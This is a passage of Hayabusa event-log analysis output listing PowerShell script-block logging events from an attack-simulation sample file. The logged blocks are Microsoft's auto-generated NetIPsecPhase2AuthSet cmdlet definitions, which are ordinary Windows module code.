'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Remove-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Rename-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Rename', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.973 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Copy-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewPolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewGPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) 